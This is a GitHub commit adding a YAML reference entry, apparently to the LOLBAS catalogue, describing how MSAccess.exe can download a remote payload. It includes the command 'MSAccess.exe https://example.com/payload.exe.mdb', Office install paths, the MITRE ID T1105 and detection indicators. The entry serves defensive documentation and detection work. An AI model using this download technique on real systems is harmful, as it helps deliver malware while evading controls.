Add MSAccess as a new downloader (#288)

Co-authored-by: Wietze <wietze@users.noreply.github.com>
This commit is contained in:
C-h4ck-0 2024-04-06 01:18:57 +07:00 committed by GitHub
parent ebbf08ec4d
commit 3c826ab1ca
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -0,0 +1,36 @@
---
Name: MSAccess.exe
Description: Microsoft Office component
Author: Nir Chako
Created: 2023-04-30
Commands:
- Command: MSAccess.exe https://example.com/payload.exe.mdb
Description: Downloads payload from remote server
Usecase: It will download a remote payload (if it has the filename extension .mdb) and place it in INetCache.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSAccess.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSAccess.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office16\MSAccess.exe
- Path: C:\Program Files\Microsoft Office\Office16\MSAccess.exe
- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSAccess.exe
- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSAccess.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office15\MSAccess.exe
- Path: C:\Program Files\Microsoft Office\Office15\MSAccess.exe
- Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSAccess.exe
- Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSAccess.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office14\MSAccess.exe
- Path: C:\Program Files\Microsoft Office\Office14\MSAccess.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office12\MSAccess.exe
- Path: C:\Program Files\Microsoft Office\Office12\MSAccess.exe
Detection:
- IOC: URL on a MSAccess command line
- IOC: MSAccess making unexpected network connections or DNS requests
Acknowledgement:
- Person: Nir Chako
Handle: '@C_h4ck_0'